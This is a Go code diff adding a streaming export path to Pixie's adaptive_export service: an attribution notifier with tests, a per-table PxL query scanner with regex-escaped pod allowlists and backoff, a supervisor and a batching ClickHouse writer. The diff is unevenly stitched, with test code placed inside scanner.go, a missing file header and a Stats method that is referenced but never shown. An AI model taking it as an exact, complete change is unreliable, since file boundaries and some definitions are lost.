+func TestNotifier_DeliversEventsWhenConsumerKeepsUp(t *testing.T) { + set := activeset.New() + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + + // Buffer >> burst so no drops are forced; throttle the submit + // loop so the consumer gets scheduled between sends. + n := NewAttributionNotifier(set, NotifierConfig{BufferSize: 1024}) + go n.Run(ctx) + + tEnd := time.Now().Add(5 * time.Minute) + for i := 0; i < 50; i++ { + n.Submit(activeset.Key{Pod: "p" + string(rune('a'+(i%26)))}, tEnd) + if i%5 == 0 { + // Yield so the consumer can drain — production callers + // (controller.handle) naturally have inter-event gaps. + time.Sleep(time.Microsecond) + } + } + // Wait until consumer drains. + deadline := time.Now().Add(500 * time.Millisecond) + for set.Size() < 26 && time.Now().Before(deadline) { + time.Sleep(5 * time.Millisecond) + } + if set.Size() != 26 { + t.Fatalf("expected 26 distinct pods, got %d", set.Size()) + } + if n.DroppedCount() != 0 { + t.Fatalf("expected 0 drops with buffer>>burst, got %d", n.DroppedCount()) + } +} + +// TestNotifier_SubmitConcurrentlySafe — the producer path must be +// safe under concurrent callers (controller has only one goroutine +// in handle, but the contract should be conservative). +func TestNotifier_SubmitConcurrentlySafe(t *testing.T) { + set := activeset.New() + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + n := NewAttributionNotifier(set, NotifierConfig{BufferSize: 256}) + go n.Run(ctx) + + var wg sync.WaitGroup + for i := 0; i < 50; i++ { + i := i + wg.Add(1) + go func() { + defer wg.Done() + for j := 0; j < 20; j++ { + n.Submit(activeset.Key{Pod: string(rune('a' + (i % 26)))}, time.Now().Add(time.Minute)) + } + }() + } + wg.Wait() + // Allow drain. 
+ deadline := time.Now().Add(500 * time.Millisecond) + for set.Size() < 26 && time.Now().Before(deadline) { + time.Sleep(5 * time.Millisecond) + } + if set.Size() == 0 { + t.Fatalf("no pods landed in ActiveSet under concurrent Submit") + } +} + +// TestNotifier_RunStopsOnCtxCancel — must drain + return promptly +// on ctx cancellation. +func TestNotifier_RunStopsOnCtxCancel(t *testing.T) { + set := activeset.New() + ctx, cancel := context.WithCancel(context.Background()) + n := NewAttributionNotifier(set, NotifierConfig{BufferSize: 16}) + done := make(chan struct{}) + go func() { n.Run(ctx); close(done) }() + + cancel() + select { + case <-done: + case <-time.After(500 * time.Millisecond): + t.Fatalf("Run did not return within 500ms of ctx cancel") + } +} + +// TestNotifier_RemoveDeliveredAsRemoval — the Notifier must +// distinguish Upsert vs Remove events. +func TestNotifier_RemoveDeliveredAsRemoval(t *testing.T) { + set := activeset.New() + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + n := NewAttributionNotifier(set, NotifierConfig{BufferSize: 4}) + go n.Run(ctx) + + k := activeset.Key{Pod: "p1"} + n.Submit(k, time.Now().Add(time.Minute)) + // drain + deadline := time.Now().Add(300 * time.Millisecond) + for set.Size() == 0 && time.Now().Before(deadline) { + time.Sleep(5 * time.Millisecond) + } + if set.Size() != 1 { + t.Fatalf("upsert didn't land") + } + n.SubmitRemove(k) + deadline = time.Now().Add(300 * time.Millisecond) + for set.Size() == 1 && time.Now().Before(deadline) { + time.Sleep(5 * time.Millisecond) + } + if set.Size() != 0 { + t.Fatalf("remove didn't land") + } +} + +// TestNotifier_DroppedCountAccurate — overflow accounting. +func TestNotifier_DroppedCountAccurate(t *testing.T) { + set := activeset.New() + n := NewAttributionNotifier(set, NotifierConfig{BufferSize: 4}) + // Don't run the consumer. 
+ const submits = 100 + for i := 0; i < submits; i++ { + n.Submit(activeset.Key{Pod: "p"}, time.Now()) + } + if got := n.DroppedCount(); got < int64(submits-4-1) { // allow ±1 slack on buffer count + t.Fatalf("expected ~%d drops, got %d", submits-4, got) + } +} + +// TestNotifier_HostPidEntriesAreFiltered — host-pid events (empty +// Pod) cannot be streamed and must be dropped at the Notifier so the +// ActiveSet never accumulates pod-less rows. +func TestNotifier_HostPidEntriesAreFiltered(t *testing.T) { + set := activeset.New() + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + n := NewAttributionNotifier(set, NotifierConfig{BufferSize: 8}) + go n.Run(ctx) + n.Submit(activeset.Key{Pod: ""}, time.Now().Add(time.Minute)) + n.Submit(activeset.Key{Pod: "real"}, time.Now().Add(time.Minute)) + deadline := time.Now().Add(300 * time.Millisecond) + for set.Size() < 1 && time.Now().Before(deadline) { + time.Sleep(5 * time.Millisecond) + } + if set.Size() != 1 { + t.Fatalf("expected 1 entry (only real), got %d", set.Size()) + } + if n.FilteredCount() < 1 { + t.Fatalf("expected at least 1 filtered, got %d", n.FilteredCount()) + } +} + +// staticAtomicCheck — make sure Stats accessors don't panic on +// a freshly-constructed notifier (no Run yet). +func TestNotifier_StatsOnFreshInstance(t *testing.T) { + set := activeset.New() + n := NewAttributionNotifier(set, NotifierConfig{}) + if n.DroppedCount() != 0 || n.FilteredCount() != 0 { + t.Fatalf("fresh notifier should report zero counters") + } +} diff --git a/src/vizier/services/adaptive_export/internal/streaming/scanner.go b/src/vizier/services/adaptive_export/internal/streaming/scanner.go new file mode 100644 index 00000000000..d77941e886e --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/streaming/scanner.go @@ -0,0 +1,357 @@ +// Copyright 2018- The Pixie Authors. 
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
//     http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
// SPDX-License-Identifier: Apache-2.0

package streaming

import (
	"context"
	"fmt"
	"strconv"
	"strings"
	"sync/atomic"
	"time"

	log "github.com/sirupsen/logrus"

	"px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset"
	"px.dev/pixie/src/vizier/services/adaptive_export/internal/reconcile"
)

// Querier executes a PxL string against a vizier and returns the
// resulting flat rows. Same shape as controller.PixieQuerier; kept
// independently here to avoid an import cycle.
type Querier interface {
	Query(ctx context.Context, pxl string) ([]map[string]any, error)
}

// ScannerConfig tunes one TableScanner. Zero-valued durations and a nil
// Rec are replaced by defaults in defaulted().
type ScannerConfig struct {
	// Table is the pixie observation table this scanner targets
	// (e.g. "pgsql_events"). REQUIRED.
	Table string

	// QueryWindow is how far back each query looks. It is a positive
	// duration; buildPxL renders it as the negative relative
	// `start_time` of the emitted PxL (a 60s window becomes "-60s").
	// Must be longer than RefreshInterval + maximum expected query
	// latency, otherwise rows in the gap between consecutive runs
	// would be missed. 0 → 60s.
	QueryWindow time.Duration

	// RefreshInterval is how long Run waits after a successful query
	// before issuing the next one while the filter is stable. A filter
	// change wakes the scanner sooner. 0 → 30s.
	RefreshInterval time.Duration

	// QueryTimeout bounds one PxL call. 0 → 180s.
	QueryTimeout time.Duration

	// BackoffInitial / BackoffMax — exponential backoff on Querier
	// errors: the wait starts at BackoffInitial, doubles after each
	// wait that elapses in full, and is capped at BackoffMax.
	// 0 → 1s / 30s.
	BackoffInitial time.Duration
	BackoffMax     time.Duration

	// Rec records per-pull read/submitted counts (ADAPTIVE_RECONCILE).
	// nil → reconcile.Nop{} in defaulted() (instrument off).
	Rec reconcile.Recorder

	// Hostname is stamped on reconcile rows.
	Hostname string
}

// defaulted returns a copy of c in which every non-positive duration and
// a nil Rec have been replaced by the defaults documented on the fields.
func (c ScannerConfig) defaulted() ScannerConfig {
	if c.QueryWindow <= 0 {
		c.QueryWindow = 60 * time.Second
	}
	if c.RefreshInterval <= 0 {
		c.RefreshInterval = 30 * time.Second
	}
	if c.QueryTimeout <= 0 {
		c.QueryTimeout = 180 * time.Second
	}
	if c.BackoffInitial <= 0 {
		c.BackoffInitial = 1 * time.Second
	}
	if c.BackoffMax <= 0 {
		c.BackoffMax = 30 * time.Second
	}
	if c.Rec == nil {
		c.Rec = reconcile.Nop{}
	}
	return c
}

// TableScanner runs ONE PxL submission per refresh cycle for ONE
// pixie table, with a pod allowlist drawn from an upstream Filter
// channel. Output goes to a per-table BatchWriter.
//
// This is the rev-3 replacement for pushPixieRows' per-hash×per-table
// fan-out. Goroutines created: 1 per TableScanner. Concurrency
// against vizier-query-broker: 1 per scanner = N (number of tables).
type TableScanner struct {
	cfg     ScannerConfig
	querier Querier
	writer  *BatchWriter
	filters <-chan Filter

	// currentFilter is the most recently received filter. It is only
	// read and written from within Run.
	currentFilter Filter

	// Counters surfaced through Stats.
	queries  atomic.Int64 // Query calls issued (successful or not)
	queryErr atomic.Int64 // Query calls that returned an error
	rowsIn   atomic.Int64 // rows returned by successful queries
	skipped  atomic.Int64 // loop iterations skipped due to an empty allowlist
}

// NewScanner wires a scanner. filters is the channel returned by
// FilterUpdater.Subscribe. cfg is passed through defaulted(), so zero
// fields pick up their defaults here.
func NewScanner(cfg ScannerConfig, querier Querier, writer *BatchWriter, filters <-chan Filter) *TableScanner {
	return &TableScanner{
		cfg:     cfg.defaulted(),
		querier: querier,
		writer:  writer,
		filters: filters,
	}
}

// Run owns one goroutine. It returns when ctx is cancelled or when the
// filters channel is closed. Loops:
//
//  1. Wait for filter (initial) — block until first one arrives.
//  2. Loop:
//     - If filter has no pods AND mode == Allowlist: skip query
//     entirely (the whole purpose: empty allowlist = no work) and
//     block until the next filter.
//     - Else: build PxL, query, push rows to writer.
//     - Sleep RefreshInterval OR until filter changes.
//  3. Backoff on Querier errors.
//
// Every query attempt, successful or failed, is reported to cfg.Rec.
func (s *TableScanner) Run(ctx context.Context) {
	// 1. Initial filter.
	select {
	case f, ok := <-s.filters:
		if !ok {
			return
		}
		s.currentFilter = f
	case <-ctx.Done():
		return
	}

	// backoff is the wait applied after the next failed query; the two
	// closures keep the reset/double-and-cap logic in one place.
	backoff := s.cfg.BackoffInitial
	resetBackoff := func() { backoff = s.cfg.BackoffInitial }
	bumpBackoff := func() {
		backoff *= 2
		if backoff > s.cfg.BackoffMax {
			backoff = s.cfg.BackoffMax
		}
	}

	for {
		if ctx.Err() != nil {
			return
		}

		// Empty allowlist short-circuit: nothing to query.
		if s.currentFilter.Mode == FilterModeAllowlist && len(s.currentFilter.Pods) == 0 {
			s.skipped.Add(1)
			// Diagnostic: an empty allowlist means the ActiveSet has no
			// members — i.e. nothing has been steered into this AE yet.
			// Logged so an operator can tell "empty ActiveSet → skipping"
			// apart from "queried but the broker returned 0 rows" (the
			// latter logs "query completed rows=0"). Naturally rate-limited:
			// we block on the next filter immediately after.
			log.WithFields(log.Fields{
				"table":   s.cfg.Table,
				"version": s.currentFilter.Version,
			}).Info("streaming.TableScanner: empty allowlist (ActiveSet has no steered pods) — skipping query until a filter with pods arrives")
			// Wait for either: a new filter arrives, or ctx done.
			select {
			case <-ctx.Done():
				return
			case f, ok := <-s.filters:
				if !ok {
					return
				}
				s.currentFilter = f
			}
			continue
		}

		// 2. Build PxL + execute. winStart/winEnd describe the window
		// for the reconcile row; they are taken from the local clock
		// just before the query is sent.
		pxl := s.buildPxL(s.currentFilter)
		winEnd := time.Now()
		winStart := winEnd.Add(-s.cfg.QueryWindow)
		qctx, cancel := context.WithTimeout(ctx, s.cfg.QueryTimeout)
		rows, err := s.querier.Query(qctx, pxl)
		cancel() // release the per-query timeout as soon as Query returns
		s.queries.Add(1)
		if err != nil {
			s.queryErr.Add(1)
			s.cfg.Rec.Record(ctx, reconcile.Row{
				TS: winEnd, Mode: "streaming", Table: s.cfg.Table,
				WinStart: winStart, WinEnd: winEnd,
				ReadCount: 0, WroteCount: 0, WriteErr: err.Error(),
				Hostname: s.cfg.Hostname,
			})
			log.WithError(err).WithFields(log.Fields{
				"table":   s.cfg.Table,
				"pods":    len(s.currentFilter.Pods),
				"mode":    s.currentFilter.Mode,
				"backoff": backoff,
			}).Warn("streaming.TableScanner: query failed; backing off")
			// Wait for the backoff to elapse OR a new filter to arrive,
			// whichever is ready first. A new filter resets the backoff
			// and retries immediately; a full wait doubles it.
			select {
			case <-ctx.Done():
				return
			case f, ok := <-s.filters:
				if !ok {
					return
				}
				s.currentFilter = f
				resetBackoff()
			case <-time.After(backoff):
				bumpBackoff()
			}
			continue
		}
		resetBackoff()
		s.rowsIn.Add(int64(len(rows)))

		// 3. Hand off to writer. submitted stays 0 when there were no
		// rows or when the writer's Submit reported false.
		submitted := 0
		if len(rows) > 0 {
			if s.writer.Submit(rows) {
				submitted = len(rows)
			}
		}
		s.cfg.Rec.Record(ctx, reconcile.Row{
			TS: winEnd, Mode: "streaming", Table: s.cfg.Table,
			WinStart: winStart, WinEnd: winEnd,
			ReadCount: int64(len(rows)), WroteCount: int64(submitted),
			Hostname: s.cfg.Hostname,
		})
		log.WithFields(log.Fields{
			"table":   s.cfg.Table,
			"pods":    len(s.currentFilter.Pods),
			"mode":    s.currentFilter.Mode,
			"rows":    len(rows),
			"version": s.currentFilter.Version,
		}).Info("streaming.TableScanner: query completed")

		// 4. Sleep until refresh OR filter change.
		select {
		case <-ctx.Done():
			return
		case f, ok := <-s.filters:
			if !ok {
				return
			}
			s.currentFilter = f
		case <-time.After(s.cfg.RefreshInterval):
		}
	}
}

// buildPxL renders the script for one query.
+// pxSetMaxRows raises Pixie's per-table result cap (default 10000) via the +// query-broker's `#px:set` query flag, mirroring internal/pxl (queryfor.go / +// compile.go). Without it the streaming/DX arm silently caps each pull at 10k +// rows while the passthrough/ALL arm (which already emits this) does not — which +// would UNDER-count DX and OVERSTATE the DX-vs-ALL volume reduction. Must be the +// first line of the script (before `import px`). +const pxSetMaxRows = "#px:set max_output_rows_per_table=1000000\n" + +func (s *TableScanner) buildPxL(f Filter) string { + relStart := "-" + strconv.FormatInt(int64(s.cfg.QueryWindow/time.Second), 10) + "s" + var b strings.Builder + b.WriteString(pxSetMaxRows) + b.WriteString("import px\n") + b.WriteString("df = px.DataFrame(table='" + s.cfg.Table + "', start_time='" + relStart + "')\n") + b.WriteString("df.namespace = px.upid_to_namespace(df.upid)\n") + b.WriteString("df.pod = px.upid_to_pod_name(df.upid)\n") + if f.Mode == FilterModeAllowlist && len(f.Pods) > 0 { + // Allowlist clause. PxL syntax exploration (2026-05-17): + // - `or` between equalities → "Expected two arguments to 'or'" + // - `|` between equalities → "Operator '|' not handled" + // - `px.contains(s, p)` → SUBSTRING (not regex) + // - `px.regex_match(p, s)` → RE2 regex match (PxL UDF + // registered in carnot/funcs/builtins/regex_ops.cc) + // → use regex_match with an anchored alternation. + b.WriteString("df = df[px.regex_match('^(") + for i, k := range f.Pods { + if i > 0 { + b.WriteString("|") + } + b.WriteString(escapeRegex(escapePxL(k.Render()))) + } + b.WriteString(")$', df.pod)]\n") + } + // Unfiltered mode: emit ALL pods on this node. The CH writer's + // downstream consumers can filter by joining adaptive_attribution. + b.WriteString("px.display(df, '" + s.cfg.Table + "')\n") + return b.String() +} + +// ScannerStats — small monitoring helper. 
// pxlEscaper backslash-escapes the backslash and the single quote, the two
// characters rewritten before text is placed in a single-quoted PxL literal.
var pxlEscaper = strings.NewReplacer(
	`\`, `\\`,
	`'`, `\'`,
)

// escapePxL returns s with every backslash and single quote prefixed by a
// backslash.
func escapePxL(s string) string {
	escaped := pxlEscaper.Replace(s)
	return escaped
}

// regexEscaper prefixes each regex metacharacter in its table with a
// backslash. k8s pod names are DNS-1123 (lowercase alphanumeric + hyphen)
// plus a "/" namespace separator — none of these are regex meta — but we
// escape defensively so a future rename rule that admits underscores or dots
// doesn't produce a silently-broken filter. The backslash itself is not part
// of the table.
var regexEscaper = func() *strings.Replacer {
	const meta = `.|()+*?[]{}^$`
	pairs := make([]string, 0, 2*len(meta))
	for i := 0; i < len(meta); i++ {
		ch := meta[i : i+1]
		pairs = append(pairs, ch, `\`+ch)
	}
	return strings.NewReplacer(pairs...)
}()

// escapeRegex returns s with the metacharacters known to regexEscaper
// defanged.
func escapeRegex(s string) string {
	defanged := regexEscaper.Replace(s)
	return defanged
}
// fakeQuerier records every PxL script it is asked to run and answers each
// call with the same canned rows.
type fakeQuerier struct {
	mu      sync.Mutex
	queries []string
	rows    []map[string]any
}

// Query appends pxl to the captured list and returns the canned rows.
func (f *fakeQuerier) Query(ctx context.Context, pxl string) ([]map[string]any, error) {
	f.mu.Lock()
	defer f.mu.Unlock()
	f.queries = append(f.queries, pxl)
	return f.rows, nil
}

// failingQuerier fails every call with err and counts the attempts.
type failingQuerier struct {
	err  error
	mu   sync.Mutex
	hits int
}

// Query bumps the hit counter and returns the configured error.
func (f *failingQuerier) Query(ctx context.Context, pxl string) ([]map[string]any, error) {
	f.mu.Lock()
	defer f.mu.Unlock()
	f.hits++
	return nil, f.err
}

// flipFlopQuerier replays a fixed script: call k uses slot k mod
// len(failures); a true slot fails, a false slot returns results[slot].
type flipFlopQuerier struct {
	mu       sync.Mutex
	idx      int
	results  [][]map[string]any
	failures []bool
}

// Query advances the script by one slot and returns that slot's outcome.
func (f *flipFlopQuerier) Query(ctx context.Context, pxl string) ([]map[string]any, error) {
	f.mu.Lock()
	defer f.mu.Unlock()
	slot := f.idx % len(f.failures)
	f.idx++
	if !f.failures[slot] {
		return f.results[slot], nil
	}
	return nil, errors.New("simulated failure")
}
+type fakeWriter struct { + count atomic.Int64 +} + +func (f *fakeWriter) WritePixieRows(ctx context.Context, table string, rows []map[string]any) error { + f.count.Add(int64(len(rows))) + return nil +} + +func TestScanner_BuildsPxLWithAllowlistOR(t *testing.T) { + cfg := ScannerConfig{Table: "pgsql_events"}.defaulted() + s := &TableScanner{cfg: cfg} + f := Filter{ + Mode: FilterModeAllowlist, + Pods: []activeset.Key{ + {Namespace: "n1", Pod: "a"}, + {Namespace: "n2", Pod: "b"}, + }, + } + pxl := s.buildPxL(f) + if !strings.HasPrefix(pxl, "#px:set max_output_rows_per_table=1000000\n") { + t.Fatalf("pxl missing the #px:set cap flag (10k-cap fix); got:\n%s", pxl) + } + if !strings.Contains(pxl, "table='pgsql_events'") { + t.Fatalf("pxl missing table: %s", pxl) + } + if !strings.Contains(pxl, "n1/a") { + t.Fatalf("pxl missing first pod in regex: %s", pxl) + } + if !strings.Contains(pxl, "n2/b") { + t.Fatalf("pxl missing second pod in regex: %s", pxl) + } + if !strings.Contains(pxl, "px.regex_match") || !strings.Contains(pxl, "df.pod)") { + t.Fatalf("pxl missing px.regex_match call: %s", pxl) + } + if !strings.Contains(pxl, "^(") || !strings.Contains(pxl, ")$") { + t.Fatalf("pxl missing anchored alternation: %s", pxl) + } +} + +func TestScanner_UnfilteredModeOmitsAllowlist(t *testing.T) { + cfg := ScannerConfig{Table: "http_events"}.defaulted() + s := &TableScanner{cfg: cfg} + f := Filter{Mode: FilterModeUnfiltered} + pxl := s.buildPxL(f) + if strings.Contains(pxl, "df.pod ==") { + t.Fatalf("unfiltered mode should not emit pod filter: %s", pxl) + } +} + +func TestScanner_EmptyAllowlistSkipsQuery(t *testing.T) { + q := &fakeQuerier{rows: nil} + w := NewBatchWriter("pgsql_events", &fakeWriter{}, WriterConfig{BatchEvery: time.Hour}) + filtCh := make(chan Filter, 4) + filtCh <- Filter{Mode: FilterModeAllowlist, Pods: nil} // empty + cfg := ScannerConfig{Table: "pgsql_events", RefreshInterval: 100 * time.Millisecond} + sc := NewScanner(cfg, q, w, filtCh) + ctx, cancel := 
context.WithTimeout(context.Background(), 200*time.Millisecond) + defer cancel() + go w.Run(ctx) + sc.Run(ctx) + st := sc.Stats() + if st.Queries != 0 { + t.Fatalf("expected 0 queries on empty allowlist, got %d", st.Queries) + } + if st.Skipped == 0 { + t.Fatalf("expected skipped > 0") + } +} + +// TestScanner_BackoffOnRepeatedErrors — after a Query error, the +// scanner must back off (NOT hot-loop). After K consecutive +// failures, the per-retry interval must be ≥ a measurable threshold. +func TestScanner_BackoffOnRepeatedErrors(t *testing.T) { + q := &failingQuerier{err: errors.New("simulated broker outage")} + w := NewBatchWriter("pgsql_events", &fakeWriter{}, WriterConfig{BatchEvery: 50 * time.Millisecond}) + filtCh := make(chan Filter, 4) + filtCh <- Filter{Mode: FilterModeAllowlist, Pods: []activeset.Key{{Pod: "p"}}} + cfg := ScannerConfig{ + Table: "pgsql_events", + RefreshInterval: 100 * time.Second, // huge — backoff must dominate, not refresh + QueryTimeout: 100 * time.Millisecond, + BackoffInitial: 50 * time.Millisecond, + BackoffMax: 200 * time.Millisecond, + } + sc := NewScanner(cfg, q, w, filtCh) + ctx, cancel := context.WithTimeout(context.Background(), 1*time.Second) + defer cancel() + go w.Run(ctx) + sc.Run(ctx) + st := sc.Stats() + // In 1 second with backoff = 50/100/200/200 → expected attempts ≤ ~10. + // Without backoff (hot-loop), we'd see thousands. + if st.Errors > 20 { + t.Fatalf("scanner appears to be hot-looping on errors: %d in 1s (expected ≤ 20)", st.Errors) + } + if st.Errors < 2 { + t.Fatalf("scanner did not retry after error: %d (expected ≥ 2)", st.Errors) + } +} + +// TestScanner_BackoffResetsOnSuccess — once a query succeeds, the +// backoff state must reset so the next failure waits BackoffInitial +// (not BackoffMax). 
// TestScanner_BackoffResetsOnSuccess — once a query succeeds, the
// backoff state must reset so the next failure waits BackoffInitial
// (not BackoffMax).
//
// NOTE(review): by hand calculation a scanner that never reset its backoff
// would still fit about 4 queries / 3 errors into the 250 ms window
// (waits of 50 ms, 10 ms, 100 ms), which also satisfies the thresholds
// below — TODO confirm and tighten if this test is meant to catch a missing
// reset.
func TestScanner_BackoffResetsOnSuccess(t *testing.T) {
	// Script: fail, succeed, fail; flipFlopQuerier wraps around after that.
	q := &flipFlopQuerier{
		results: [][]map[string]any{
			nil, // first call fails
			{{"x": 1}},
			nil, // third call fails again
		},
		failures: []bool{true, false, true},
	}
	// BatchEvery of an hour keeps the writer's timer flush out of the picture.
	w := NewBatchWriter("pgsql_events", &fakeWriter{}, WriterConfig{BatchEvery: 1 * time.Hour})
	filtCh := make(chan Filter, 4)
	filtCh <- Filter{Mode: FilterModeAllowlist, Pods: []activeset.Key{{Pod: "p"}}}
	cfg := ScannerConfig{
		Table:           "pgsql_events",
		RefreshInterval: 10 * time.Millisecond,
		QueryTimeout:    100 * time.Millisecond,
		BackoffInitial:  50 * time.Millisecond,
		BackoffMax:      400 * time.Millisecond,
	}
	sc := NewScanner(cfg, q, w, filtCh)
	ctx, cancel := context.WithTimeout(context.Background(), 250*time.Millisecond)
	defer cancel()
	go w.Run(ctx)
	sc.Run(ctx)
	st := sc.Stats()
	// Without backoff reset, a stuck-at-Max scanner would hit fewer
	// retries (waiting BackoffMax=400ms = 0 retries in 250ms after
	// first error). With reset, success → 50ms → fail → 100ms etc.
	// — more retries fit in the window.
	//
	// Concrete: after each "fail | success | fail | success ..." cycle,
	// backoff stays at the initial value, so retries are FAST. We
	// expect ≥ 3 queries and ≥ 2 errors in 250 ms.
	if st.Queries < 3 {
		t.Fatalf("scanner did fewer queries than expected; queries=%d errors=%d (backoff may not be resetting)", st.Queries, st.Errors)
	}
	if st.Errors < 2 {
		t.Fatalf("expected ≥ 2 errors, got %d", st.Errors)
	}
}

// TestScanner_QueriesOnNonEmptyFilter checks the happy path end to end: a
// non-empty allowlist triggers at least one query and the returned rows
// reach the sink through the BatchWriter.
func TestScanner_QueriesOnNonEmptyFilter(t *testing.T) {
	q := &fakeQuerier{rows: []map[string]any{{"time_": time.Now(), "pod": "n/p"}}}
	fw := &fakeWriter{}
	// 50 ms flush cadence so the timer flush fires well inside the 300 ms run.
	w := NewBatchWriter("pgsql_events", fw, WriterConfig{BatchEvery: 50 * time.Millisecond})
	filtCh := make(chan Filter, 4)
	filtCh <- Filter{Mode: FilterModeAllowlist, Pods: []activeset.Key{{Pod: "p"}}}
	cfg := ScannerConfig{Table: "pgsql_events", RefreshInterval: 50 * time.Millisecond, QueryTimeout: 1 * time.Second}
	sc := NewScanner(cfg, q, w, filtCh)
	ctx, cancel := context.WithTimeout(context.Background(), 300*time.Millisecond)
	defer cancel()
	go w.Run(ctx)
	sc.Run(ctx)
	if sc.Stats().Queries == 0 {
		t.Fatalf("expected at least one query")
	}
	if fw.count.Load() == 0 {
		t.Fatalf("writer received no rows; expected at least 1")
	}
}
+// +// SPDX-License-Identifier: Apache-2.0 + +package streaming + +import ( + "context" + "sync" + + log "github.com/sirupsen/logrus" +) + +// Supervisor owns the lifecycle of N TableScanner + N BatchWriter +// pairs (one pair per pixie table) plus the shared FilterUpdater. +// Single entry point from main.go. +// +// Goroutine inventory at steady state: +// +// 1 FilterUpdater +// N TableScanners (1 per pixie table) +// N BatchWriters (1 per pixie table) +// ────────────────── +// 1 + 2N total +// +// For N=10 (current PushPixieTables count): 21 goroutines, constant +// regardless of active hash count. +type Supervisor struct { + updater *FilterUpdater + scanners []*TableScanner + writers []*BatchWriter + tables []string + + wg sync.WaitGroup +} + +// NewSupervisor wires up scanners + writers for the given table list. +// One scanner + one writer per table. Each scanner gets its own +// channel from the updater. +func NewSupervisor( + updater *FilterUpdater, + querier Querier, + sink SinkWriter, + tables []string, + scannerCfg ScannerConfig, + writerCfg WriterConfig, +) *Supervisor { + s := &Supervisor{ + updater: updater, + tables: tables, + } + for _, t := range tables { + w := NewBatchWriter(t, sink, writerCfg) + c := scannerCfg + c.Table = t + sc := NewScanner(c, querier, w, updater.Subscribe()) + s.scanners = append(s.scanners, sc) + s.writers = append(s.writers, w) + } + return s +} + +// Run starts FilterUpdater + every scanner + every writer. +// Blocks until ctx is cancelled, at which point all goroutines +// drain and Run returns. 
+func (s *Supervisor) Run(ctx context.Context) { + log.WithFields(log.Fields{ + "tables": len(s.tables), + "goroutines": 1 + 2*len(s.tables), + }).Info("streaming.Supervisor: starting rev-3 push flow") + + s.wg.Add(1) + go func() { defer s.wg.Done(); s.updater.Run(ctx) }() + + for i := range s.scanners { + sc := s.scanners[i] + w := s.writers[i] + s.wg.Add(2) + go func() { defer s.wg.Done(); w.Run(ctx) }() + go func() { defer s.wg.Done(); sc.Run(ctx) }() + } + s.wg.Wait() +} diff --git a/src/vizier/services/adaptive_export/internal/streaming/writer.go b/src/vizier/services/adaptive_export/internal/streaming/writer.go new file mode 100644 index 00000000000..313ab1ae4cf --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/streaming/writer.go @@ -0,0 +1,154 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package streaming + +import ( + "context" + "time" + + log "github.com/sirupsen/logrus" +) + +// SinkWriter is the abstraction over sink.WritePixieRows. Defining +// it here avoids a sink package import cycle and lets tests inject +// fakes. +type SinkWriter interface { + WritePixieRows(ctx context.Context, table string, rows []map[string]any) error +} + +// BatchWriter buffers per-table pixie rows and flushes them as one +// CH INSERT either when the buffer hits BatchRows OR when BatchEvery +// elapses since the last successful flush, whichever comes first. 
+// One goroutine per BatchWriter. +// +// Why batching: rev-2's per-hash fan-out produced ~10 small INSERTs +// per pass per pod. CH handles small INSERTs poorly (each spawns a +// merge; merge throughput is the bottleneck on heavily-active +// tables). One larger INSERT per N seconds dramatically reduces +// merge pressure. +type BatchWriter struct { + table string + sink SinkWriter + in chan []map[string]any + batchRows int + batchEvery time.Duration + bufferCap int +} + +// WriterConfig tunes a BatchWriter. Zero → defaults. +type WriterConfig struct { + BatchRows int // flush when buffered ≥ this many rows. default 10000. + BatchEvery time.Duration // flush when this much time has elapsed. default 5 s. + BufferCap int // input chan capacity (rows-of-batches). default 64. +} + +func (c WriterConfig) defaulted() WriterConfig { + if c.BatchRows <= 0 { + c.BatchRows = 10000 + } + if c.BatchEvery <= 0 { + c.BatchEvery = 5 * time.Second + } + if c.BufferCap <= 0 { + c.BufferCap = 64 + } + return c +} + +// NewBatchWriter constructs but does not start the writer. +func NewBatchWriter(table string, sink SinkWriter, cfg WriterConfig) *BatchWriter { + cfg = cfg.defaulted() + return &BatchWriter{ + table: table, + sink: sink, + in: make(chan []map[string]any, cfg.BufferCap), + batchRows: cfg.BatchRows, + batchEvery: cfg.BatchEvery, + bufferCap: cfg.BufferCap, + } +} + +// Submit hands rows to the writer. Non-blocking — if the input chan +// is full, the rows are DROPPED (oldest semantics handled at the +// table-scanner level; per-call drop here is the simpler contract). +// Returns true if accepted, false if dropped. Caller can log on drop. 
+func (w *BatchWriter) Submit(rows []map[string]any) bool { + if len(rows) == 0 { + return true + } + select { + case w.in <- rows: + return true + default: + log.WithFields(log.Fields{ + "table": w.table, + "rows": len(rows), + }).Warn("streaming.BatchWriter: input chan full, dropping batch") + return false + } +} + +// Run owns the BatchWriter goroutine. Returns when ctx is cancelled, +// after attempting a best-effort final flush. +func (w *BatchWriter) Run(ctx context.Context) { + var buf []map[string]any + ticker := time.NewTicker(w.batchEvery) + defer ticker.Stop() + + flush := func(reason string) { + if len(buf) == 0 { + return + } + // Bound the CH write so a stalled CH HTTP doesn't pin us. + fctx, cancel := context.WithTimeout(ctx, 60*time.Second) + err := w.sink.WritePixieRows(fctx, w.table, buf) + cancel() + if err != nil { + log.WithError(err).WithFields(log.Fields{ + "table": w.table, + "rows": len(buf), + "reason": reason, + }).Warn("streaming.BatchWriter: flush failed") + } else { + log.WithFields(log.Fields{ + "table": w.table, + "rows": len(buf), + "reason": reason, + }).Info("streaming.BatchWriter: flushed batch") + } + buf = buf[:0] + } + + for { + select { + case <-ctx.Done(): + flush("shutdown") + return + + case rows := <-w.in: + buf = append(buf, rows...) + if len(buf) >= w.batchRows { + flush("size") + // Reset ticker so we don't get a redundant flush 100ms later + 